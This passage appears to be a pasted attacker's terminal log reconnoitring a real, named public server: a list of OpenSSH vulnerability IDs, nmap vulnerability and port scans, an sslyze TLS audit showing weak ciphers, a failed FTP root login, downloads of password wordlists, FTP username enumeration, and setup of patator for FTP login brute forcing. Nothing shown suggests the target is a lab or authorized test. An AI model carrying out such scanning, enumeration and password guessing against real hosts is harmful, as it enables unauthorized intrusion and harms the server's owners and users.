  2368. | [1004115] OpenSSH Buffer Overflow in Kerberos Ticket and AFS Token Processing Lets Local Users Execute Arbitrary Code With Root Level Permissions
  2369. | [1003758] OpenSSH Off-by-one 'Channels' Bug May Let Authorized Remote Users Execute Arbitrary Code with Root Privileges
  2370. | [1002895] OpenSSH UseLogin Environment Variable Bug Lets Local Users Execute Commands and Gain Root Access
  2371. | [1002748] OpenSSH 3.0 Denial of Service Condition May Allow Remote Users to Crash the sshd Daemon and KerberosV Configuration Error May Allow Remote Users to Partially Authenticate When Authentication Should Not Be Permitted
  2372. | [1002734] OpenSSH's S/Key Implementation Information Disclosure Flaw Provides Remote Users With Information About Valid User Accounts
  2373. | [1002455] OpenSSH May Fail to Properly Restrict IP Addresses in Certain Configurations
  2374. | [1002432] OpenSSH's Sftp-server Subsystem Lets Authorized Remote Users with Restricted Keypairs Obtain Additional Access on the Server
  2375. | [1001683] OpenSSH Allows Authorized Users to Delete Other User Files Named Cookies
  2376. |
  2377. | OSVDB - http://www.osvdb.org:
  2378. | [92034] GSI-OpenSSH auth-pam.c Memory Management Authentication Bypass
  2379. | [90474] Red Hat / Fedora PAM Module for OpenSSH Incorrect error() Function Calling Local Privilege Escalation
  2380. | [90007] OpenSSH logingracetime / maxstartup Threshold Connection Saturation Remote DoS
  2381. | [81500] OpenSSH gss-serv.c ssh_gssapi_parse_ename Function Field Length Value Parsing Remote DoS
  2382. | [78706] OpenSSH auth-options.c sshd auth_parse_options Function authorized_keys Command Option Debug Message Information Disclosure
  2383. | [75753] OpenSSH PAM Module Aborted Conversation Local Information Disclosure
  2384. | [75249] OpenSSH sftp-glob.c remote_glob Function Glob Expression Parsing Remote DoS
  2385. | [75248] OpenSSH sftp.c process_put Function Glob Expression Parsing Remote DoS
  2386. | [72183] Portable OpenSSH ssh-keysign ssh-rand-helper Utility File Descriptor Leak Local Information Disclosure
  2387. | [70873] OpenSSH Legacy Certificates Stack Memory Disclosure
  2388. | [69658] OpenSSH J-PAKE Public Parameter Validation Shared Secret Authentication Bypass
  2389. | [67743] Novell NetWare OpenSSH SSHD.NLM Absolute Path Handling Remote Overflow
  2390. | [59353] OpenSSH sshd Local TCP Redirection Connection Masking Weakness
  2391. | [58495] OpenSSH sshd ChrootDirectory Feature SetUID Hard Link Local Privilege Escalation
  2392. | [56921] OpenSSH Unspecified Remote Compromise
  2393. | [53021] OpenSSH on ftp.openbsd.org Trojaned Distribution
  2394. | [50036] OpenSSH CBC Mode Chosen Ciphertext 32-bit Chunk Plaintext Context Disclosure
  2395. | [49386] OpenSSH sshd TCP Connection State Remote Account Enumeration
  2396. | [48791] OpenSSH on Debian sshd Crafted Username Arbitrary Remote SELinux Role Access
  2397. | [47635] OpenSSH Packages on Red Hat Enterprise Linux Compromised Distribution
  2398. | [47227] OpenSSH X11UseLocalhost X11 Forwarding Port Hijacking
  2399. | [45873] Cisco WebNS SSHield w/ OpenSSH Crafted Large Packet Remote DoS
  2400. | [43911] OpenSSH ~/.ssh/rc ForceCommand Bypass Arbitrary Command Execution
  2401. | [43745] OpenSSH X11 Forwarding Local Session Hijacking
  2402. | [43371] OpenSSH Trusted X11 Cookie Connection Policy Bypass
  2403. | [39214] OpenSSH linux_audit_record_event Crafted Username Audit Log Injection
  2404. | [37315] pam_usb OpenSSH Authentication Unspecified Issue
  2405. | [34850] OpenSSH on Mac OS X Key Generation Remote Connection DoS
  2406. | [34601] OPIE w/ OpenSSH Account Enumeration
  2407. | [34600] OpenSSH S/KEY Authentication Account Enumeration
  2408. | [32721] OpenSSH Username Password Complexity Account Enumeration
  2409. | [30232] OpenSSH Privilege Separation Monitor Weakness
  2410. | [29494] OpenSSH packet.c Invalid Protocol Sequence Remote DoS
  2411. | [29266] OpenSSH GSSAPI Authentication Abort Username Enumeration
  2412. | [29264] OpenSSH Signal Handler Pre-authentication Race Condition Code Execution
  2413. | [29152] OpenSSH Identical Block Packet DoS
  2414. | [27745] Apple Mac OS X OpenSSH Nonexistent Account Login Enumeration DoS
  2415. | [23797] OpenSSH with OpenPAM Connection Saturation Forked Process Saturation DoS
  2416. | [22692] OpenSSH scp Command Line Filename Processing Command Injection
  2417. | [20216] OpenSSH with KerberosV Remote Authentication Bypass
  2418. | [19142] OpenSSH Multiple X11 Channel Forwarding Leaks
  2419. | [19141] OpenSSH GSSAPIAuthentication Credential Escalation
  2420. | [18236] OpenSSH no pty Command Execution Local PAM Restriction Bypass
  2421. | [16567] OpenSSH Privilege Separation LoginGraceTime DoS
  2422. | [16039] Solaris 108994 Series Patch OpenSSH LDAP Client Authentication DoS
  2423. | [9562] OpenSSH Default Configuration Anon SSH Service Port Bounce Weakness
  2424. | [9550] OpenSSH scp Traversal Arbitrary File Overwrite
  2425. | [6601] OpenSSH *realloc() Unspecified Memory Errors
  2426. | [6245] OpenSSH SKEY/BSD_AUTH Challenge-Response Remote Overflow
  2427. | [6073] OpenSSH on FreeBSD libutil Arbitrary File Read
  2428. | [6072] OpenSSH PAM Conversation Function Stack Modification
  2429. | [6071] OpenSSH SSHv1 PAM Challenge-Response Authentication Privilege Escalation
  2430. | [5536] OpenSSH sftp-server Restricted Keypair Restriction Bypass
  2431. | [5408] OpenSSH echo simulation Information Disclosure
  2432. | [5113] OpenSSH NIS YP Netgroups Authentication Bypass
  2433. | [4536] OpenSSH Portable AIX linker Privilege Escalation
  2434. | [3938] OpenSSL and OpenSSH /dev/random Check Failure
  2435. | [3456] OpenSSH buffer_append_space() Heap Corruption
  2436. | [2557] OpenSSH Multiple Buffer Management Multiple Overflows
  2437. | [2140] OpenSSH w/ PAM Username Validity Timing Attack
  2438. | [2112] OpenSSH Reverse DNS Lookup Bypass
  2439. | [2109] OpenSSH sshd Root Login Timing Side-Channel Weakness
  2440. | [1853] OpenSSH Symbolic Link 'cookies' File Removal
  2441. | [839] OpenSSH PAMAuthenticationViaKbdInt Challenge-Response Remote Overflow
  2442. | [781] OpenSSH Kerberos TGT/AFS Token Passing Remote Overflow
  2443. | [730] OpenSSH Channel Code Off by One Remote Privilege Escalation
  2444. | [688] OpenSSH UseLogin Environment Variable Local Command Execution
  2445. | [642] OpenSSH Multiple Key Type ACL Bypass
  2446. | [504] OpenSSH SSHv2 Public Key Authentication Bypass
  2447. | [341] OpenSSH UseLogin Local Privilege Escalation
  2448. |_
  2449.  
  2450. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  2451. Nmap done: 1 IP address (1 host up) scanned in 9.64 seconds
  2452.  
  2453.  
  2454. root@blackbox:/usr/share/nmap/scripts# nmap --script vuln -p80 184.154.192.250
  2455. Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-22 14:32 CST
  2456. Pre-scan script results:
  2457. | broadcast-avahi-dos:
  2458. | Discovered hosts:
  2459. | 224.0.0.251
  2460. | After NULL UDP avahi packet DoS (CVE-2011-1002).
  2461. |_ Hosts are all up (not vulnerable).
  2462.  
  2463.  
  2464. root@blackbox:/usr/share/nmap/scripts# nmap --script vuln -p443 184.154.192.250
  2465. Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-22 14:41 CST
  2466. Pre-scan script results:
  2467. | broadcast-avahi-dos:
  2468. | Discovered hosts:
  2469. | 224.0.0.251
  2470. | After NULL UDP avahi packet DoS (CVE-2011-1002).
  2471. |_ Hosts are all up (not vulnerable).
  2472.  
  2473.  
  2474.  
  2475.  
  2476. root@blackbox:/usr/share/nmap/scripts# nmap --script ssh-hassh.nse -p 22 184.154.192.250 --open
  2477. Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-22 14:43 CST
  2478. Nmap scan report for server.etours.cn (184.154.192.250)
  2479. Host is up (0.037s latency).
  2480.  
  2481. PORT STATE SERVICE
  2482. 22/tcp open ssh
  2483.  
  2484. Nmap done: 1 IP address (1 host up) scanned in 1.52 seconds
  2485.  
  2486.  
  2487. root@blackbox:~# git clone https://github.com/0x4D31/hassh-utils.git
  2488. root@blackbox:~# cd hassh-utils/
  2489.  
  2490. root@blackbox:/usr/share/nmap/scripts# nmap --script ssh-hassh.nse --script-args database=hasshd 184.154.192.250 22
  2491. Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-22 14:46 CST
  2492. Nmap scan report for server.etours.cn (184.154.192.250)
  2493. Host is up (0.14s latency).
  2494. Not shown: 981 closed ports
  2495. PORT STATE SERVICE
  2496. 21/tcp open ftp
  2497. 22/tcp open ssh
  2498. 25/tcp open smtp
  2499. 53/tcp open domain
  2500. 80/tcp open http
  2501. 106/tcp open pop3pw
  2502. 110/tcp open pop3
  2503. 111/tcp open rpcbind
  2504. 143/tcp open imap
  2505. 161/tcp filtered snmp
  2506. 443/tcp open https
  2507. 465/tcp open smtps
  2508. 554/tcp open rtsp
  2509. 587/tcp open submission
  2510. 993/tcp open imaps
  2511. 995/tcp open pop3s
  2512. 3306/tcp open mysql
  2513. 7070/tcp open realserver
  2514. 8443/tcp open https-alt
  2515.  
  2516. Nmap done: 2 IP addresses (1 host up) scanned in 15.66 seconds
  2517.  
  2518.  
  2519.  
  2520. root@blackbox:/usr/share/nmap/scripts# nmap --script ssh-hassh.nse --script-args client_string=SSH-2.0-asdf -p 22 184.154.192.250
  2521. Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-22 14:47 CST
  2522. Nmap scan report for server.etours.cn (184.154.192.250)
  2523. Host is up (0.038s latency).
  2524.  
  2525. PORT STATE SERVICE
  2526. 22/tcp open ssh
  2527.  
  2528. Nmap done: 1 IP address (1 host up) scanned in 1.54 seconds
  2529.  
  2530.  
  2531.  
  2532. root@blackbox:/usr/share/nmap/scripts# nmap -oN scan.nmap -v -sS -sU -T5 --top-ports 1000 184.154.192.250
  2533.  
  2534. Discovered open port 111/tcp on 184.154.192.250
  2535. Discovered open port 143/tcp on 184.154.192.250
  2536. Discovered open port 53/tcp on 184.154.192.250
  2537. Discovered open port 443/tcp on 184.154.192.250
  2538. Discovered open port 554/tcp on 184.154.192.250
  2539. Discovered open port 7070/tcp on 184.154.192.250
  2540. Discovered open port 21/tcp on 184.154.192.250
  2541. Discovered open port 22/tcp on 184.154.192.250
  2542. Discovered open port 587/tcp on 184.154.192.250
  2543. Discovered open port 80/tcp on 184.154.192.250
  2544. Discovered open port 110/tcp on 184.154.192.250
  2545. Discovered open port 25/tcp on 184.154.192.250
  2546. Discovered open port 993/tcp on 184.154.192.250
  2547. Discovered open port 3306/tcp on 184.154.192.250
  2548. Discovered open port 995/tcp on 184.154.192.250
  2549. Discovered open port 8443/tcp on 184.154.192.250
  2550. Discovered open port 106/tcp on 184.154.192.250
  2551. Discovered open port 465/tcp on 184.154.192.250
  2552. Discovered open port 111/udp on 184.154.192.250
  2553.  
  2554. Not shown: 1115 closed ports, 865 open|filtered ports
  2555. PORT STATE SERVICE
  2556. 21/tcp open ftp
  2557. 22/tcp open ssh
  2558. 25/tcp open smtp
  2559. 53/tcp open domain
  2560. 80/tcp open http
  2561. 106/tcp open pop3pw
  2562. 110/tcp open pop3
  2563. 111/tcp open rpcbind
  2564. 143/tcp open imap
  2565. 161/tcp filtered snmp
  2566. 443/tcp open https
  2567. 465/tcp open smtps
  2568. 554/tcp open rtsp
  2569. 587/tcp open submission
  2570. 993/tcp open imaps
  2571. 995/tcp open pop3s
  2572. 3306/tcp open mysql
  2573. 7070/tcp open realserver
  2574. 8443/tcp open https-alt
  2575. 111/udp open rpcbind
  2576.  
  2577.  
  2578. root@blackbox:/usr/share/nmap/scripts# nmap -oN vulners.nmap -sV --version-intensity 9 --script vulners -p 80 184.154.192.250
  2579. Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-22 14:50 CST
  2580. Nmap scan report for server.etours.cn (184.154.192.250)
  2581. Host is up (0.037s latency).
  2582.  
  2583. PORT STATE SERVICE VERSION
  2584. 80/tcp open http Apache httpd (PleskLin)
  2585. |_http-server-header: Apache
  2586.  
  2587. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  2588. Nmap done: 1 IP address (1 host up) scanned in 11.10 seconds
  2589.  
  2590.  
  2591. root@blackbox:/usr/share/nmap/scripts# nmap -oN vulners.nmap -sV --version-intensity 9 --script vulners -p 22 184.154.192.250
  2592. Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-22 14:51 CST
  2593. Nmap scan report for server.etours.cn (184.154.192.250)
  2594. Host is up (0.037s latency).
  2595.  
  2596. PORT STATE SERVICE VERSION
  2597. 22/tcp open tcpwrapped
  2598.  
  2599. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  2600. Nmap done: 1 IP address (1 host up) scanned in 2.07 seconds
  2601.  
  2602.  
  2603. root@blackbox:/usr/share/nmap/scripts# nmap --script ssh-hassh.nse -p 22 --open -Pn 184.154.192.250 -oX test.xml -vv
  2604.  
  2605. root@blackbox:/usr/share/nmap/scripts# nmap --script ssh-hassh.nse -p 22 184.154.192.250
  2606. Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-22 14:52 CST
  2607. Nmap scan report for server.etours.cn (184.154.192.250)
  2608. Host is up (0.037s latency).
  2609.  
  2610. PORT STATE SERVICE
  2611. 22/tcp open ssh
  2612.  
  2613. Nmap done: 1 IP address (1 host up) scanned in 1.56 seconds
  2614.  
  2615. EXPLAIN SHELL
  2616.  
  2617. https://explainshell.com/explain?cmd=nmap+-sC+-sV+-v++-oN
  2618.  
  2619.  
  2620. SSL SCAN USING SSLYZE
  2621.  
  2622. root@blackbox:/usr/share/nmap/scripts# sslyze --regular 184.154.192.250:443
  2623.  
  2624.  
  2625.  
  2626. AVAILABLE PLUGINS
  2627. -----------------
  2628.  
  2629. HttpHeadersPlugin
  2630. SessionRenegotiationPlugin
  2631. CertificateInfoPlugin
  2632. SessionResumptionPlugin
  2633. FallbackScsvPlugin
  2634. OpenSslCcsInjectionPlugin
  2635. CompressionPlugin
  2636. RobotPlugin
  2637. HeartbleedPlugin
  2638. OpenSslCipherSuitesPlugin
  2639.  
  2640.  
  2641.  
  2642. CHECKING HOST(S) AVAILABILITY
  2643. -----------------------------
  2644.  
  2645. 184.154.192.250:443 => 184.154.192.250
  2646.  
  2647.  
  2648.  
  2649.  
  2650. SCAN RESULTS FOR 184.154.192.250:443 - 184.154.192.250
  2651. ------------------------------------------------------
  2652.  
  2653. * TLSV1_3 Cipher Suites:
  2654. Server rejected all cipher suites.
  2655.  
  2656. * Downgrade Attacks:
  2657. TLS_FALLBACK_SCSV: VULNERABLE - Signaling cipher suite not supported
  2658.  
  2659. * Session Renegotiation:
  2660. Client-initiated Renegotiation: OK - Rejected
  2661. Secure Renegotiation: VULNERABLE - Secure renegotiation not supported
  2662.  
  2663. * OpenSSL CCS Injection:
  2664. OK - Not vulnerable to OpenSSL CCS injection
  2665.  
  2666. * Deflate Compression:
  2667. VULNERABLE - Server supports Deflate compression
  2668.  
  2669. * Resumption Support:
  2670. With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
  2671. With TLS Tickets: OK - Supported
  2672.  
  2673. * TLSV1_1 Cipher Suites:
  2674. Server rejected all cipher suites.
  2675.  
  2676. * ROBOT Attack:
  2677. OK - Not vulnerable
  2678.  
  2679. * SSLV3 Cipher Suites:
  2680. Forward Secrecy OK - Supported
  2681. RC4 INSECURE - Supported
  2682.  
  2683. Preferred:
  2684. None - Server followed client cipher suite preference.
  2685. Accepted:
  2686. TLS_DHE_RSA_WITH_AES_256_CBC_SHA DH-1024 bits 256 bits HTTP 200 OK
  2687. TLS_RSA_WITH_AES_256_CBC_SHA - 256 bits HTTP 200 OK
  2688. TLS_DHE_RSA_WITH_AES_128_CBC_SHA DH-1024 bits 128 bits HTTP 200 OK
  2689. TLS_RSA_WITH_AES_128_CBC_SHA - 128 bits HTTP 200 OK
  2690. TLS_RSA_WITH_RC4_128_MD5 - 128 bits HTTP 200 OK
  2691. TLS_RSA_WITH_RC4_128_SHA - 128 bits HTTP 200 OK
  2692. TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA DH-1024 bits 112 bits HTTP 200 OK
  2693. TLS_RSA_WITH_3DES_EDE_CBC_SHA - 112 bits HTTP 200 OK
  2694. TLS_DHE_RSA_WITH_DES_CBC_SHA DH-1024 bits 56 bits HTTP 200 OK
  2695. TLS_RSA_WITH_DES_CBC_SHA - 56 bits HTTP 200 OK
  2696. TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA DH-512 bits 40 bits HTTP 200 OK
  2697. TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5 - 40 bits HTTP 200 OK
  2698. TLS_RSA_EXPORT_WITH_DES40_CBC_SHA - 40 bits HTTP 200 OK
  2699. TLS_RSA_EXPORT_WITH_RC4_40_MD5 - 40 bits HTTP 200 OK
  2700.  
  2701. * SSLV2 Cipher Suites:
  2702. Forward Secrecy INSECURE - Not Supported
  2703. RC4 INSECURE - Supported
  2704.  
  2705. Preferred:
  2706. None - Server followed client cipher suite preference.
  2707. Accepted:
  2708. SSL_CK_RC2_128_CBC_WITH_MD5 - 128 bits HTTP 200 OK
  2709. SSL_CK_RC4_128_WITH_MD5 - 128 bits HTTP 200 OK
  2710. SSL_CK_DES_192_EDE3_CBC_WITH_MD5 - 112 bits HTTP 200 OK
  2711. SSL_CK_DES_64_CBC_WITH_MD5 - 56 bits HTTP 200 OK
  2712. SSL_CK_RC2_128_CBC_EXPORT40_WITH_MD5 - 40 bits HTTP 200 OK
  2713. SSL_CK_RC4_128_EXPORT40_WITH_MD5 - 40 bits HTTP 200 OK
  2714.  
  2715. * Certificate Information:
  2716. Content
  2717. SHA1 Fingerprint: 3f12da575e9a2e4cdc624a2c64f2b3d9e8fea274
  2718. Common Name: Parallels Panel
  2719. Issuer: Parallels Panel
  2720. Serial Number: 1315993919
  2721. Not Before: 2011-09-14 09:51:59
  2722. Not After: 2012-09-13 09:51:59
  2723. Signature Algorithm: sha1
  2724. Public Key Algorithm: RSA
  2725. Key Size: 2048
  2726. Exponent: 65537 (0x10001)
  2727. DNS Subject Alternative Names: []
  2728.  
  2729. Trust
  2730. Hostname Validation: FAILED - Certificate does NOT match 184.154.192.250
  2731. Android CA Store (8.1.0_r9): FAILED - Certificate is NOT Trusted: self signed certificate
  2732. iOS CA Store (11): FAILED - Certificate is NOT Trusted: self signed certificate
  2733. Java CA Store (jre-10.0.2): FAILED - Certificate is NOT Trusted: self signed certificate
  2734. macOS CA Store (High Sierra): FAILED - Certificate is NOT Trusted: self signed certificate
  2735. Mozilla CA Store (2018-04-12): FAILED - Certificate is NOT Trusted: self signed certificate
  2736. Windows CA Store (2018-06-30): FAILED - Certificate is NOT Trusted: self signed certificate
  2737. Symantec 2018 Deprecation: OK - Not a Symantec-issued certificate
  2738. Received Chain: Parallels Panel
  2739. Verified Chain: ERROR - Could not build verified chain (certificate untrusted?)
  2740. Received Chain Contains Anchor: ERROR - Could not build verified chain (certificate untrusted?)
  2741. Received Chain Order: OK - Order is valid
  2742. Verified Chain contains SHA1: ERROR - Could not build verified chain (certificate untrusted?)
  2743.  
  2744. Extensions
  2745. OCSP Must-Staple: NOT SUPPORTED - Extension not found
  2746. Certificate Transparency: NOT SUPPORTED - Extension not found
  2747.  
  2748. OCSP Stapling
  2749. NOT SUPPORTED - Server did not send back an OCSP response
  2750.  
  2751. * OpenSSL Heartbleed:
  2752. OK - Not vulnerable to Heartbleed
  2753.  
  2754. * TLSV1_2 Cipher Suites:
  2755. Server rejected all cipher suites.
  2756.  
  2757. * TLSV1 Cipher Suites:
  2758. Forward Secrecy OK - Supported
  2759. RC4 INSECURE - Supported
  2760.  
  2761. Preferred:
  2762. None - Server followed client cipher suite preference.
  2763. Accepted:
  2764. TLS_DHE_RSA_WITH_AES_256_CBC_SHA DH-1024 bits 256 bits HTTP 200 OK
  2765. TLS_RSA_WITH_AES_256_CBC_SHA - 256 bits HTTP 200 OK
  2766. TLS_DHE_RSA_WITH_AES_128_CBC_SHA DH-1024 bits 128 bits HTTP 200 OK
  2767. TLS_RSA_WITH_AES_128_CBC_SHA - 128 bits HTTP 200 OK
  2768. TLS_RSA_WITH_RC4_128_SHA - 128 bits HTTP 200 OK
  2769. TLS_RSA_WITH_RC4_128_MD5 - 128 bits HTTP 200 OK
  2770. TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA DH-1024 bits 112 bits HTTP 200 OK
  2771. TLS_RSA_WITH_3DES_EDE_CBC_SHA - 112 bits HTTP 200 OK
  2772. TLS_DHE_RSA_WITH_DES_CBC_SHA DH-1024 bits 56 bits HTTP 200 OK
  2773. TLS_RSA_WITH_DES_CBC_SHA - 56 bits HTTP 200 OK
  2774. TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA DH-512 bits 40 bits HTTP 200 OK
  2775. TLS_RSA_EXPORT_WITH_DES40_CBC_SHA - 40 bits HTTP 200 OK
  2776. TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5 - 40 bits HTTP 200 OK
  2777. TLS_RSA_EXPORT_WITH_RC4_40_MD5 - 40 bits HTTP 200 OK
  2778.  
  2779.  
  2780. SCAN COMPLETED IN 18.49 S
  2781. -------------------------
  2782.  
  2783.  
  2784.  
  2785. CHECK ANONYMOUS FTP LOGIN FTP Client for File Traversal
  2786.  
  2787. root@blackbox:/usr/share/nmap/scripts# ftp 184.154.192.250
  2788. Connected to 184.154.192.250.
  2789. 220 ProFTPD 1.3.3e Server (ProFTPD) [184.154.192.250]
  2790. Name (184.154.192.250:root):
  2791. 331 Password required for root
  2792. Password:
  2793. 530 Login incorrect.
  2794. Login failed.
  2795. Remote system type is UNIX.
  2796. Using binary mode to transfer files.
  2797. ftp> quit
  2798. 221 Goodbye.
  2799.  
  2800.  
  2801. download password list from here:
  2802.  
  2803. https://github.com/berzerk0/Probable-Wordlists
  2804.  
  2805. root@blackbox:~# git clone https://github.com/jeanphorn/wordlist.git
  2806. root@blackbox:~# cd wordlist/
  2807. root@blackbox:~/wordlist# ls
  2808. adobe_top100_password.txt passlist.txt router_default_password.md
  2809. hydra.restore rdp_passlist.txt ssh_passwd.txt
  2810. pass_list.rar README.md usernames.txt
  2811.  
  2812. or search locally
  2813.  
  2814. user list
  2815. /usr/share/sniper/plugins/BruteX/wordlists/simple-users.txt
  2816.  
  2817. root@blackbox:/opt/patator# locate john.txt
  2818. /opt/commix/src/txt/passwords_john.txt
  2819. /opt/hacktronian/commix/src/txt/passwords_john.txt
  2820. /usr/share/commix/src/txt/passwords_john.txt
  2821.  
  2822.  
  2823. ftp-user-enum
  2824.  
  2825. root@blackbox:/opt# wget http://pentestmonkey.net/tools/ftp-user-enum/ftp-user-enum-1.0.tar.gz
  2826. root@blackbox:/opt# tar -xzf ftp-user-enum-1.0.tar.gz
  2827. root@blackbox:/opt# cd ftp-user-enum-1.0/
  2828. root@blackbox:/opt/ftp-user-enum-1.0# cp ftp-user-enum.pl /usr/local/bin/
  2829. root@blackbox:/opt/ftp-user-enum-1.0# perl -MCPAN -e shell
  2830. cpan[1]> install Getopt::Std
  2831. cpan[2]> exit
  2832. Lockfile removed.
  2833.  
  2834.  
  2835. root@blackbox:/opt/ftp-user-enum-1.0# ls
  2836. CHANGELOG COPYING COPYING.GPL ftp-user-enum.pl ftp-user-enum-user-docs.pdf
  2837. root@blackbox:/opt/ftp-user-enum-1.0# ftp-user-enum.pl -M sol -U /usr/share/sniper/plugins/BruteX/wordlists/simple-users.txt -t 184.154.192.250
  2838. Starting ftp-user-enum v1.0 ( http://pentestmonkey.net/tools/ftp-user-enum )
  2839.  
  2840. ----------------------------------------------------------
  2841. | Scan Information |
  2842. ----------------------------------------------------------
  2843.  
  2844. Mode ..................... sol
  2845. Worker Processes ......... 5
  2846. Usernames file ........... /usr/share/sniper/plugins/BruteX/wordlists/simple-users.txt
  2847. Target count ............. 1
  2848. Username count ........... 34
  2849. Target TCP port .......... 21
  2850. Query timeout ............ 15 secs
  2851.  
  2852. ######## Scan started at Wed Jan 22 14:56:54 2020 #########
  2853. @184.154.192.250: bee
  2854. @184.154.192.250: administrator
  2855. backup@184.154.192.250: backup
  2856. @184.154.192.250: anonymous
  2857. @184.154.192.250: admin
  2858. @184.154.192.250: guest
  2859. @184.154.192.250: ftp
  2860. @184.154.192.250: GUEST
  2861. @184.154.192.250: info
  2862. @184.154.192.250: mail
  2863. @184.154.192.250: mysql
  2864. @184.154.192.250: msfadmin
  2865. @184.154.192.250: nobody
  2866. @184.154.192.250: mailadmin
  2867. oracle@184.154.192.250: oracle
  2868. @184.154.192.250: owaspbwa
  2869. @184.154.192.250: private
  2870. @184.154.192.250: postfix
  2871. @184.154.192.250: proftpd
  2872. @184.154.192.250: postgres
  2873. @184.154.192.250: root
  2874. @184.154.192.250: public
  2875. @184.154.192.250: support
  2876. @184.154.192.250: sys
  2877. @184.154.192.250: superadmin
  2878. @184.154.192.250: systemadmin
  2879. @184.154.192.250: system
  2880. @184.154.192.250: systemadministrator
  2881. @184.154.192.250: test
  2882. @184.154.192.250: tomcat
  2883. @184.154.192.250: webmaster
  2884. @184.154.192.250: user
  2885. www-data@184.154.192.250: www-data
  2886. Fortimanager_Access@184.154.192.250: Fortimanager_Access
  2887. ######## Scan completed at Wed Jan 22 14:58:39 2020 #########
  2888. 34 results.
  2889.  
  2890. 34 queries in 105 seconds (0.3 queries / sec)
  2891.  
  2892. root@blackbox:/opt/ftp-user-enum-1.0# ftp-user-enum.pl -M iu -U /usr/share/sniper/plugins/BruteX/wordlists/simple-users.txt -t 184.154.192.250
  2893. Starting ftp-user-enum v1.0 ( http://pentestmonkey.net/tools/ftp-user-enum )
  2894.  
  2895. ----------------------------------------------------------
  2896. | Scan Information |
  2897. ----------------------------------------------------------
  2898.  
  2899. Mode ..................... iu
  2900. Worker Processes ......... 5
  2901. Usernames file ........... /usr/share/sniper/plugins/BruteX/wordlists/simple-users.txt
  2902. Target count ............. 1
  2903. Username count ........... 34
  2904. Target TCP port .......... 21
  2905. Query timeout ............ 15 secs
  2906.  
  2907. ######## Scan started at Wed Jan 22 14:59:28 2020 #########
  2908. @184.154.192.250: administrator
  2909. @184.154.192.250: anonymous
  2910. backup@184.154.192.250: backup
  2911. @184.154.192.250: admin
  2912. @184.154.192.250: bee
  2913. @184.154.192.250: ftp
  2914. @184.154.192.250: GUEST
  2915. @184.154.192.250: guest
  2916. @184.154.192.250: info
  2917. @184.154.192.250: mail
  2918. @184.154.192.250: mailadmin
  2919. @184.154.192.250: msfadmin
  2920. @184.154.192.250: mysql
  2921. @184.154.192.250: nobody
  2922. oracle@184.154.192.250: oracle
  2923. @184.154.192.250: owaspbwa
  2924. @184.154.192.250: postfix
  2925. @184.154.192.250: postgres
  2926. @184.154.192.250: private
  2927. @184.154.192.250: proftpd
  2928. @184.154.192.250: public
  2929. @184.154.192.250: root
  2930. @184.154.192.250: superadmin
  2931. @184.154.192.250: support
  2932. @184.154.192.250: sys
  2933. @184.154.192.250: system
  2934. @184.154.192.250: systemadmin
  2935. @184.154.192.250: test
  2936. @184.154.192.250: systemadministrator
  2937. @184.154.192.250: tomcat
  2938. @184.154.192.250: user
  2939. @184.154.192.250: webmaster
  2940. www-data@184.154.192.250: www-data
  2941. Fortimanager_Access@184.154.192.250: Fortimanager_Access
  2942. ######## Scan completed at Wed Jan 22 14:59:33 2020 #########
  2943. 34 results.
  2944.  
  2945. 34 queries in 5 seconds (6.8 queries / sec)
  2946.  
  2947.  
  2948. root@blackbox:/opt/ftp-user-enum-1.0# ftp-user-enum.pl -U /usr/share/sniper/plugins/BruteX/wordlists/simple-users.txt -t 184.154.192.250
  2949. Starting ftp-user-enum v1.0 ( http://pentestmonkey.net/tools/ftp-user-enum )
  2950.  
  2951. ----------------------------------------------------------
  2952. | Scan Information |
  2953. ----------------------------------------------------------
  2954.  
  2955. Mode ..................... sol
  2956. Worker Processes ......... 5
  2957. Usernames file ........... /usr/share/sniper/plugins/BruteX/wordlists/simple-users.txt
  2958. Target count ............. 1
  2959. Username count ........... 34
  2960. Target TCP port .......... 21
  2961. Query timeout ............ 15 secs
  2962.  
  2963. ######## Scan started at Wed Jan 22 15:00:21 2020 #########
  2964. @184.154.192.250: administrator
  2965. @184.154.192.250: anonymous
  2966. @184.154.192.250: admin
  2967. @184.154.192.250: bee
  2968. backup@184.154.192.250: backup
  2969. @184.154.192.250: ftp
  2970. @184.154.192.250: guest
  2971. @184.154.192.250: GUEST
  2972. @184.154.192.250: info
  2973. @184.154.192.250: mail
  2974. @184.154.192.250: mailadmin
  2975. @184.154.192.250: msfadmin
  2976. oracle@184.154.192.250: oracle
  2977. @184.154.192.250: mysql
  2978. @184.154.192.250: nobody
  2979. @184.154.192.250: owaspbwa
  2980. @184.154.192.250: postfix
  2981. @184.154.192.250: postgres
  2982. @184.154.192.250: private
  2983. @184.154.192.250: proftpd
  2984. @184.154.192.250: public
  2985. @184.154.192.250: root
  2986. @184.154.192.250: superadmin
  2987. @184.154.192.250: support
  2988. @184.154.192.250: sys
  2989. @184.154.192.250: systemadmin
  2990. @184.154.192.250: systemadministrator
  2991. @184.154.192.250: test
  2992. @184.154.192.250: tomcat
  2993. @184.154.192.250: system
  2994. @184.154.192.250: user
  2995. @184.154.192.250: webmaster
  2996. www-data@184.154.192.250: www-data
  2997. Fortimanager_Access@184.154.192.250: Fortimanager_Access
  2998. ######## Scan completed at Wed Jan 22 15:02:06 2020 #########
  2999. 34 results.
  3000.  
  3001. 34 queries in 105 seconds (0.3 queries / sec)
  3002.  
  3003.  
  3004. root@blackbox:/opt# git clone https://github.com/lanjelot/patator
  3005. root@blackbox:/opt/patator# python patator.py ftp_login --help
  3006.  
  3007.  
